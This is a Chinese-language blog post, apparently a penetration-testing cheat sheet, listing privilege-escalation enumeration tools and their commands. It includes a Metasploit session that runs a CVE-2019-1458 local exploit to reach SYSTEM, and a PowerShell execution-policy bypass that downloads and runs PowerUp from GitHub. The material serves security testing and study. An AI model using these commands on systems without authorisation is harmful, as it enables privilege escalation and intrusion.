提权扫描工具一览

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1
Find-AllVulns

使用msf查询补丁和可利用提权漏洞

# 查询补丁meterpreter> run post/windows/gather/enum_patches [ ] KB2999226 installed on 11/25/2020[ ] KB976902 installed on 11/21/2010

# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run

# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM

使用powerup检查提权漏洞

powershell.exe -exec bypass -Command '& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}'
powershell.exe -nop -exec bypass -c 'IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks'

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

accesschk 'd:\dir'查看所有用户在d盘dir路径的子路径的权限

accesschk 'Administrator 'd:\dir'查看Administrator用户在d盘dir路径的子路径的权限

accesschk Administrators -c *查看Administrators组对所有服务的权限

accesschk -k Guest hklm\software查看Guest用户对hklm\software注册表的权限

accesschk -ou User查看User用户对全局对象的权限
作者:Leticia's Blog ,详情点击阅读原文。
(0)

相关推荐

  • 鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

    渗透攻击红队 一个专注于红队攻击的公众号 大家好,这里是 渗透攻击红队 的第 54 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新 DDE DDE 是一个自定义字段,用户可插入文档. ...

  • 业务流程梳理方法工具一览

    近期公司业务与架构发生变化和调整,在业务和架构定型的过程,自然会涉及业务流程和权责的梳理,过程中也不断使用添加了很多方法,梳理出来以期有用. 01 APQC流程框架 APQC(美国生产力和质量中心)流 ...

  • 利用QQ和搜狗输入法进行提权

    声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白.请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后 ...

  • 投稿 | 使用Exchange服务器中的Writedacl实现域提权的提权

    本文作者:VastSky(Ms08067实验室读者) 前言 在域环境中,如果安装Exchange后,系统会添加一个名为Microsoft Exchange Security Groups.Exchan ...

  • 不良资产查询工具一览(最全合集)

    来源:银行青年 原标题:不良资产查询工具一览(最全合集) 尽职调查又称谨慎性调查,是指投资人在与目标企业达成初步合作意向后,经协商一致,投资人对目标企业一切与本次投资有关的事项进行现场调查.资料分析的 ...

  • 工具|Windows主机漏洞扫描工具v2

    0x01 前言 之前发布了一篇Windows主机漏洞扫描工具v1,目前由于微软官方更新了查询安全更新的站点,因而本工具需要进行相应的更新. 微软官方安全通知网站: https://msrc.micro ...

  • 常见调酒工具一览

    最早的鸡尾酒最有可能在1500年代发明的,那时候英国海军水手和海盗用粗糙的朗姆酒和柑橘类水果,糖,茶和其他香料混合在一起,以遮住朗姆酒劣质的味道增强朗姆酒的风味. 自从在七大洋中航行以来,调酒就成为了 ...

  • 干货|windows提权速查流程 收藏备用

    干货|windows提权速查流程 收藏备用

  • 盐湖提锂概念龙头股一览

    1600773西藏城投14.429.99%2011年8月份,公司与北方集团合计支付补偿对价1亿元,取得结则茶卡盐湖61%权益,公司支付6721万元.其采矿权评估价值为16931.51万元,主要矿物成分 ...

  • 域控提权合集

    0x01.前言 菜鸡一枚,标题起的可能有点大,只是个人笔记整理的一个合集(所以基本每个例子都会有实例).所以虽然说是合集,可能都没有囊括到各位大佬会的一半.还请各位大佬轻喷 0x02.目录 GPP和S ...